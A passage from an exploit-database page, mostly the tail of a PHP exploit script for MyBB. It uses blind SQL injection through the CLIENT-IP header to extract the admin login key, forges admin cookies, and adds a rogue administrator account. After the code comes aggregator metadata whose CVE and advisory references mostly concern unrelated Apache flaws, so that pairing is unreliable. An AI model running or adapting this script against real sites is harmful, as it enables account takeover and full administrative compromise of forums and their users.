echo "unable to disclose table prefix...\n";
}
sleep(1);
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(65,90));//A-Z letters
$chars=array_merge($chars,range(97,122));//a-f letters
$j=1;
$loginkey="";
while (!strstr($loginkey,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
echo "admin cookie -> ".$cookie."\r\n";

$data='-----------------------------7d62702f250530
Content-Disposition: form-data; name="action";

do_add
-----------------------------7d62702f250530
Content-Disposition: form-data; name="userusername";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="newpassword";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="email";

suntzoi@suntzu.org
-----------------------------7d62702f250530
Content-Disposition: form-data; name="usergroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="additionalgroups[]";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="displaygroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="Add User";

Add User
-----------------------------7d62702f250530--
';

$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("The user has successfully been added",$html))
{
echo "exploit succeeded... now login as admin\n";
echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
}
else
{
echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
}
?>

# milw0rm.com [2006-07-15]

Trust: 1.0

sources: EXPLOIT-DB: 2012

EXPLOIT LANGUAGE

php

Trust: 1.0

sources: EXPLOIT-DB: 2012

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 2012

TYPE

'CLIENT-IP' SQL Injection

Trust: 1.0

sources: EXPLOIT-DB: 2012

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:protocol

Trust: 0.5

tag:proof of concept

Trust: 0.5

tag:info disclosure

Trust: 0.5

sources: PACKETSTORM: 109284

CREDITS

rgod

Trust: 1.0

sources: EXPLOIT-DB: 2012

EXTERNAL IDS

db:NVDid:CVE-2011-4084

Trust: 1.0

db:NVDid:CVE-2006-3775

Trust: 1.0

db:NVDid:CVE-2011-5034

Trust: 1.0

db:NVDid:CVE-2011-5035

Trust: 1.0

db:NVDid:CVE-2011-4885

Trust: 1.0

db:NVDid:CVE-2011-4858

Trust: 1.0

db:EXPLOIT-DBid:2012

Trust: 1.0

db:NVDid:CVE-2012-0053

Trust: 0.8

db:JUNIPERid:JSA10642

Trust: 0.6

db:JUNIPERid:JSA10585

Trust: 0.6

db:PACKETSTORMid:109284

Trust: 0.5

db:HITACHIid:HS12-033

Trust: 0.3

db:BIDid:51706

Trust: 0.3

db:JUNIPERid:JSA10658

Trust: 0.3

db:NVDid:CVE-2011-3368

Trust: 0.3

db:BIDid:49957

Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 2012

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-5034

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2011-4858

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2011-4885

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2006-3775

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2011-4084

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2011-5035

Trust: 1.0

url:http://support.avaya.com/css/p8/documents/100158872

Trust: 0.6

url:http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301&ac.admitted=1332965374461.876444892.492883150

Trust: 0.6

url:http://httpd.apache.org/

Trust: 0.6

url:http://kb.juniper.net/infocenter/index?page=content&id=jsa10642&cat=sirt_1&actp=list

Trust: 0.6

url:http://kb.juniper.net/infocenter/index?page=content&id=jsa10585

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2012-0053

Trust: 0.5

url:http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302

Trust: 0.3

url:https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745

Trust: 0.3

url:http://httpd.apache.org/security/vulnerabilities_20.html

Trust: 0.3

url:http://www.sophos.com/en-us/support/knowledgebase/119773.aspx

Trust: 0.3

url:http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html

Trust: 0.3

url:http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912

Trust: 0.3

url:http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041

Trust: 0.3

url:http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e

Trust: 0.3

url:http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities

Trust: 0.3

url:https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational

Trust: 0.3

url:http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html

Trust: 0.3

url:http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf

Trust: 0.3

url:http://httpd.apache.org/security/vulnerabilities_22.html

Trust: 0.3

url:http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html

Trust: 0.3

url:http://support.avaya.com/css/p8/documents/100157326

Trust: 0.3

url:http://www.fujitsu.com/global/support/software/security/products-f/interstage-201104e.html

Trust: 0.3

url:http://support.avaya.com/css/p8/documents/100151220

Trust: 0.3

url:http://kb.juniper.net/infocenter/index?page=content&id=jsa10658&cat=sirt_1&actp=list

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=nas2b7c57b1f1035675186257927003c8d48

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html

Trust: 0.3

url:http://seclists.org/fulldisclosure/2011/oct/232

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=swg1pm48384

Trust: 0.3

url:https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03517954&ac.admitted=1349807398574.876444892.199480143

Trust: 0.3

url:http://www-01.ibm.com/support/docview.wss?uid=swg27014506

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html

Trust: 0.3

url:http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf

Trust: 0.3

url:http://support.avaya.com/css/p8/documents/100152144

Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 2012

SOURCES

db:BIDid:51706
db:BIDid:49957
db:PACKETSTORMid:109284
db:EXPLOIT-DBid:2012

LAST UPDATE DATE

2023-05-30T11:42:44.329000+00:00


SOURCES UPDATE DATE

db:BIDid:51706date:2015-04-13T21:30:00
db:BIDid:49957date:2015-05-07T17:07:00

SOURCES RELEASE DATE

db:BIDid:51706date:2012-01-23T00:00:00
db:BIDid:49957date:2011-10-05T00:00:00
db:PACKETSTORMid:109284date:2012-01-31T11:11:11
db:EXPLOIT-DBid:2012date:2006-07-15T00:00:00